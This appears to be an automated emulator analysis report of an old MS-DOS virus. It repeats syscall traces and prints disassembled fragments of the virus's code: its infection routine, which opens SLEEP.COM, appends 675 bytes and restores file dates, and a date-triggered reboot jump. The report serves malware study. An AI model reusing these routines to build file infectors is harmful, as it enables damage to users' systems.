2018-12-25T11:59:43.753250187Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.75637691Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.760209992Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.771529085Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.774837752Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.78321849Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.794528955Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.798420766Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.805808665Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.813064861Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.816183333Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.821116178Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.827491668Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.83087523Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.833062136Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.83582443Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.847642848Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.849732433Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.851578084Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.856345237Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.859583218Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.866717747Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.873709322Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.877063879Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.888737103Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.897407167Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.90205483Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.90376167Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.906471435Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.916377049Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.91849914Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.927395603Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.938398921Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.9421877Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.950882123Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.958121508Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.960386223Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.971132496Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.978538009Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.982386983Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.984047267Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.987441529Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.997479314Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.99896616Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.007712982Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.019933266Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.023209097Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.031066647Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.039483819Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.042329872Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.045479969Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.051361541Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.054357722Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.056050288Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.058410315Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.444429815Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.446742659Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.448023941Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.449329601Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.452975011Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.459615005Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.466029471Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.473215678Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.48852951Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.490442865Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.513405949Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.520774105Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.527925641Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:43.529394423Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.533429365Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.543305043Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.545373093Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.554947425Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.565585801Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.568514564Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.576605143Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.583850763Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.585727664Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.596567812Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.603648295Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.606529912Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.607884439Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.610451588Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.620010645Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.622142684Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.63124448Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.647423598Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.650317206Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.657810137Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.665961686Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.668019512Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.680045323Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.687250162Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.690393183Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.69243548Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.695163302Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.704654907Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.706598713Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.714997734Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.725483078Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.728449109Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.737187685Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.744905353Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.746734281Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.762752574Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.775337722Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.778300641Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.780408528Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.783533486Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.792991921Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.795173322Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.803588144Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.814358023Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.818336332Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.826233927Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.834033397Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.836672886Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.843548171Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.849268005Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.852550533Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.854653914Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.857824847Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.869975342Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.872293464Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.874220159Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.878937097Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.882323896Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.889582421Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.897502857Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.900569716Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.910173175Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.91472251Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.917273772Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.918532996Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.920417649Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.927066768Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.928307082Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.933435165Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.940869415Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.94338173Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.951873744Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.956679441Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.959012547Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.97051196Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.978681507Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.980681995Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.981837962Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.984228461Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.992425961Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.994111241Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.002861944Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.013961733Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.01829723Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.027541335Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.034779641Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.036758146Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.039791638Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.045054808Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.047654884Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.049073521Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.051781617Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.58721614Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.589318753Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.592720152Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.593933798Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.597423536Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.604222943Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.610639239Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.617732062Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.62542296Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.627639641Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.64813812Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.656393745Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.663707238Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:43.665293005Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.668431917Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.677981363Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.679373765Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.688007561Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.69892765Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.702584046Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.710465256Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.717983793Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.719849057Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.730943617Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.739566625Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.743063878Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.744925624Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.753643282Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.762839281Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.764579565Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.773708227Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.784802639Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.787619235Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.795002924Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.802325024Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.804243155Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.81535087Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.823161257Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.826525413Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.828361529Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.832413322Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.842313677Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.844052654Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.854259153Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.865136103Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.86805068Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.875833595Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.88309614Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.885233856Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.897008376Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.910447933Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.918331684Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.920528819Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.923735096Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.932946498Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.934976661Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.944496925Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.955680669Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.958899433Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.967742212Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.974756959Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.976849693Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.982675989Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.988161358Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.991485431Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.993507906Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.996196818Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.008029043Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.0096614Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.010985235Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.015178072Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.022639326Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.031189354Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.038792581Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.041125804Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.05981449Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.067514814Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.070952466Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.077189171Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.080081782Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.090130015Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.092753547Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.10203577Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.113487701Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.117461952Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.125134459Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.132727589Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.136273487Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.147795271Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.156160984Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.160703797Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.163280394Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.166505146Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.176268322Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.179509129Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.186646449Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.196861962Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.201091396Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.208872676Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.216390209Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.219138899Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.222359022Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.228098901Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.231463936Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.233180777Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.235552486Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:43.650962671Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:43.652609396Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.654276087Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:43.655620559Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:43.659290882Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:43.66436399Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:43.671293713Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:43.680997427Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:43.692507722Z 62 PC: 12b51 | Close file
2018-12-25T11:59:43.694358837Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:43.710221606Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.71715423Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:43.720009907Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:43.721376979Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:43.724297871Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:43.733198052Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:43.735108023Z 62 PC: 12c38 | Close file
2018-12-25T11:59:43.743537336Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.7533622Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.755952643Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.7634042Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.770650504Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.772871657Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.784144486Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.790766103Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.793491856Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.795014971Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.797670778Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.805924904Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.807586637Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.815620245Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.825345988Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.828270192Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.840574175Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:43.847115671Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:43.84943071Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.859839794Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:43.866556386Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:43.869738107Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:43.871799485Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:43.874462794Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:43.883029378Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:43.885262655Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:43.894508427Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:43.904809933Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:43.908424737Z 61 PC: 12c58 | Open file (See above)
